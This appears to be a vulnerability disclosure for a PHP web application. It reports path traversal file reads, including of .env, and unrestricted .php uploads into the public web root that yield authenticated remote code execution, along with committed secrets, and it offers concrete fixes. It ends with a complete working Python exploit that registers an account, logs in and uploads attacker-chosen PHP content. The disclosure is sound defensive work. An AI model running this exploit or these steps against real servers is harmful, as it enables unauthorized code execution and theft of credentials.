unrestricted file upload, and PHP execution from public upload path

[Lsra1n]

Problem

The upload flow accepts extraData.uploadDir and only performs a very weak path safety check based on ... It does not enforce that uploads remain inside a fixed safe directory.

The file upload configuration for the file storage module also does not restrict extensions or MIME types.

Impact

An authenticated user can upload arbitrary file types, including .php, to a chosen location such as:

/application/public/upload/files/Documents

Issue 3: Remote code execution through uploaded PHP files

Problem

Uploaded files can be placed under the public web root, and Nginx/PHP-FPM will execute .php files from that location.

Impact

This leads to authenticated remote code execution.

Observed behavior

A harmless PHP proof file uploaded to the public files directory was executed successfully when requested through the browser.

Issue 4: Sensitive secrets committed to the repository

Problem

The repository includes:

• .env
• JWT key files under config/jwt/dev/
• JWT key files under config/jwt/prod/

Impact

If these values are real and reused in deployments, an attacker may be able to:

• recover database credentials
• recover JWT signing material
• forge valid tokens
• fully compromise deployed instances

Reproduction overview

I was able to reproduce the issues on a deployed instance with the following high-level flow:

1. Authenticate as a normal user
2. Call POST /upload/send/
3. Set uploadConfigId to the file storage configuration
4. Provide a .php payload as file content
5. Set extraData.uploadDir to a public directory under /application/public/upload/files/Documents
6. Request the uploaded file through the web server
7. Observe that PHP is executed

I also confirmed that /public/get-file/{path} can be used to retrieve /application/.env.

If needed, I can provide a private PoC.

Expected behavior

• File download endpoints should only serve files from an explicitly allowed directory
• Uploads should be restricted to server-defined directories only
• File storage uploads should reject executable extensions such as .php
• Public upload directories should never allow PHP execution
• Secrets and key material should not be committed to the repository

Actual behavior

• Arbitrary filesystem paths can be read
• Upload target paths can be influenced by the client
• Executable files can be uploaded into the public web root
• Uploaded PHP files are executed by the server
• Sensitive secrets are present in the repository

Suggested fixes

1. Restrict /public/get-file/{path} to a fixed allowlisted base directory
2. Remove support for client-controlled absolute upload directories
3. Enforce strict extension and MIME allowlists for every upload configuration
4. Explicitly block executable extensions such as .php, .phtml, .phar, etc.
5. Store uploads outside the web root
6. Configure Nginx to never execute PHP from upload directories
7. Remove committed secrets from the repository
8. Rotate:
   • database credentials
   • APP_SECRET
   • JWT keys
   • any other exposed credentials

Severity

Critical

Because the current design allows authenticated arbitrary file read and authenticated remote code execution, and repository secrets may further increase the blast radius.

Thanks.

[Lsra1n]

this is my poc

usage : python3 quick_poc_upload.py http://ip:port ''

#!/usr/bin/env python3
import argparse
import base64
import json
import sys
import urllib.error
import urllib.request

UPLOAD_CONFIG_ID = "645dsf789shkdczs23431245jk687sd123"
UPLOAD_DIR = "/application/public/upload/files/Documents"
FILENAME = "1.php"

EMAIL = "audit_20260326@example.com"
USERNAME = "audit_20260326"
PASSWORD = "Passw0rd!2026"

def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Auto-register/login and upload fixed file 1.php to the default Documents path."
)
parser.add_argument(
"url",
help="Backend base URL, for example: http://127.0.0.1:8002",
)
parser.add_argument(
"content",
help="Content to upload into 1.php",
)
parser.add_argument(
"--timeout",
type=int,
default=20,
help="HTTP timeout in seconds. Default: 20",
)
return parser.parse_args()

def request_json(method: str, url: str, timeout: int, payload: dict | None = None, token: str | None = None) -> dict:
body = None
headers = {"Content-Type": "application/json"}

if payload is not None:
    body = json.dumps(payload).encode("utf-8")

if token:
    headers["Authorization"] = f"Bearer {token}"

req = urllib.request.Request(url=url, data=body, method=method)
for key, value in headers.items():
    req.add_header(key, value)

try:
    with urllib.request.urlopen(req, timeout=timeout) as response:
        return json.loads(response.read().decode("utf-8"))
except urllib.error.HTTPError as exc:
    text = exc.read().decode("utf-8", errors="replace")
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        raise RuntimeError(f"HTTP {exc.code}: {text}") from exc

def ensure_account(base_url: str, timeout: int) -> None:
register_url = base_url + "/register-user"
register_payload = {
"email": EMAIL,
"username": USERNAME,
"password": PASSWORD,
"passwordConfirmed": PASSWORD,
"lockPassword": PASSWORD,
"lockPasswordConfirmed": PASSWORD,
}
register_result = request_json("POST", register_url, timeout, register_payload)

if register_result.get("success"):
    return

register_message = str(register_result.get("message", ""))
known_non_fatal_messages = [
    "active user exists",
    "existing active user",
    "only one active user is allowed",
    "user with email exists",
]
lowered_message = register_message.lower()
if any(part in lowered_message for part in known_non_fatal_messages):
    return

raise RuntimeError(f"Register failed: {json.dumps(register_result, ensure_ascii=False)}")

def login(base_url: str, timeout: int) -> str:
login_url = base_url + "/login"
login_payload = {
"username": EMAIL,
"password": PASSWORD,
}
result = request_json("POST", login_url, timeout, login_payload)
token = result.get("token", "")
if not token:
raise RuntimeError(f"Login failed: {json.dumps(result, ensure_ascii=False)}")
return token

def build_access_url(base_url: str, public_path: str) -> str:
marker = "/public/"
index = public_path.find(marker)
if index == -1:
return base_url + "/upload/files/Documents/" + FILENAME

relative_path = public_path[index + len("/public"):]
return base_url + relative_path

def upload(base_url: str, timeout: int, token: str, content: str) -> str:
upload_url = base_url + "/upload/send/"
raw_content = content.encode("utf-8")
payload = {
"fileContent": base64.b64encode(raw_content).decode("ascii"),
"fileName": FILENAME,
"fileSize": len(raw_content),
"uploadConfigId": UPLOAD_CONFIG_ID,
"extraData": {
"uploadDir": UPLOAD_DIR,
},
"tags": [],
}

result = request_json("POST", upload_url, timeout, payload, token=token)
if not result.get("success"):
    raise RuntimeError(f"Upload failed: {json.dumps(result, ensure_ascii=False)}")

public_path = result.get("publicPath", "")
return build_access_url(base_url, public_path)

def main() -> int:
args = parse_args()
base_url = args.url.rstrip("/")

try:
    ensure_account(base_url, args.timeout)
    token = login(base_url, args.timeout)
    access_url = upload(base_url, args.timeout, token, args.content)
except Exception as exc:
    print(f"[!] {exc}", file=sys.stderr)
    return 1

print(access_url)
return 0

if name == "main":
raise SystemExit(main())